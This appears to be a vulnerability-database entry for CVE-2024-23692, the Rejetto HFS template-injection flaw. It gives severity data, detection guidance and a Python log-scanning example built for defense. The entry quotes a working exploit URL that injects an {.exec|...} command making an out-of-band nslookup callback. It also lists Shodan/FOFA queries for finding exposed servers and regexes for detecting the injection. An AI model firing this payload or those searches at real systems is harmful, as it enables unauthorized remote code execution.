CVE-2024-23692
published 2024-05-31

Priority: P1 · 99 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability (due 2024-07-30)
Exploited in the wild
EPSS: 99.48% (99.9th percentile)
Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.

Affected

1 range

Vendor  | Product          | Version range | Fixed in
rejetto | http_file_server | <= 2.4        | -

Detection & IOCs (extracted from sources)

url: {{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
other: shodan:product:"HttpFileServer httpd"
other: fofa:"HttpFileServer" && server=="HFS 2.3m"
process: mshta.exe
  • Exploit requests use HTTP GET with template injection payload in query parameters; look for URL-encoded newlines (%0A) and HFS macro syntax (e.g., {.exec|...}) in the query string targeting the HFS root path.
  • HATVIBE C2 communication uses HTTP PUT requests; monitor for anomalous PUT traffic from hosts running HFS to the listed C2 IPs/domains.
  • Detect HATVIBE persistence via scheduled tasks spawning mshta.exe; alert on scheduled task creation invoking mshta.exe on Windows hosts.
  • Nuclei template matcher checks HTTP response body for the string 'rejetto' as a confirmation of successful exploitation; use this as a detection signal in HTTP response inspection.
  • Insikt Group provides Snort and YARA rules for HATVIBE and CHERRYSPY; deploy these rules in IDS/IPS for network and host-based detection of TAG-110 tooling delivered via CVE-2024-23692 exploitation.
  • The Nuclei template uses an out-of-band DNS interaction (interactsh) as the primary matcher; the exploit payload requires a live interactsh callback to confirm RCE and will not fire in air-gapped or DNS-blocked environments.
  • The exploit sets a 15-second execution timeout for the injected command; detections relying on response timing or content may miss executions that exceed this window.
  • The C2 IPs and domains listed are associated with TAG-110's broader HATVIBE/CHERRYSPY campaign and are not exclusively tied to CVE-2024-23692 exploitation; they should be used as campaign-level indicators rather than exploit-specific ones.
  • Rejetto HFS 2.3m is no longer supported; no patch exists for the 2.x branch. The only remediation is migration to HFS version 3.
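
Added example (not from the sources quoted on this page): a log check for the first detection note above, flagging GET requests to the HFS root path whose decoded query string carries HFS macro syntax, with the URL-encoded newline reported as a supporting signal. It assumes combined-log-format access logs; the sample lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Client IP and request line of a combined-log-format entry (assumed log format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
EXEC_RE = re.compile(r"\{\.\s*exec\s*\|", re.IGNORECASE)

def inspect(line):
    """Return (client_ip, signals) for one log line; signals is empty if clean."""
    m = REQUEST_RE.search(line)
    if not m or m.group("method") != "GET":
        return None, []
    target = urlsplit(m.group("target"))
    if target.path not in ("", "/"):        # the note above: payload targets the HFS root path
        return m.group("ip"), []
    query = unquote(target.query)           # decode once so %7B.exec%7C is seen as {.exec|
    signals = []
    if "\n" in query:
        signals.append("encoded-newline")   # %0A / %0a in the raw query string
    if "{." in query:
        signals.append("hfs-macro")         # any HFS macro opener
    if EXEC_RE.search(query):
        signals.append("exec-macro")        # the {.exec|...} macro specifically
    return m.group("ip"), signals

def scan(lines):
    """Return [(line_no, ip, signals)] for lines that carry HFS macro syntax."""
    hits = []
    for no, line in enumerate(lines, 1):
        ip, signals = inspect(line)
        if "hfs-macro" in signals:          # a newline alone is too weak to alert on
            hits.append((no, ip, signals))
    return hits

# Constructed sample log: documentation IPs, placeholder text instead of a command.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jun/2024:10:00:01 +0000] "GET /?n=%0A&search=%25x%25}{.exec|EXAMPLE.} HTTP/1.1" 200 512',
    '203.0.113.11 - - [01/Jun/2024:10:00:05 +0000] "GET /?n=%0a&search=%7B.exec%7CEXAMPLE.%7D HTTP/1.1" 200 498',
    '198.51.100.7 - - [01/Jun/2024:10:01:00 +0000] "GET /?search=report.pdf HTTP/1.1" 200 1024',
    '198.51.100.8 - - [01/Jun/2024:10:02:00 +0000] "GET /?note=a%0Ab HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for no, ip, signals in scan(SAMPLE_LOG):
        print(f"line {no}: {ip} -> {', '.join(signals)}")
```

The check decodes the query string only once, so nested encodings would need an extra normalisation pass before matching.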

CVSS provenance

Source    | Version | Score | Severity | Vector
nvd       | v3.1    | 9.8   | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck |         | 9.8   | CRITICAL |
cisa      |         | 9.8   | CRITICAL |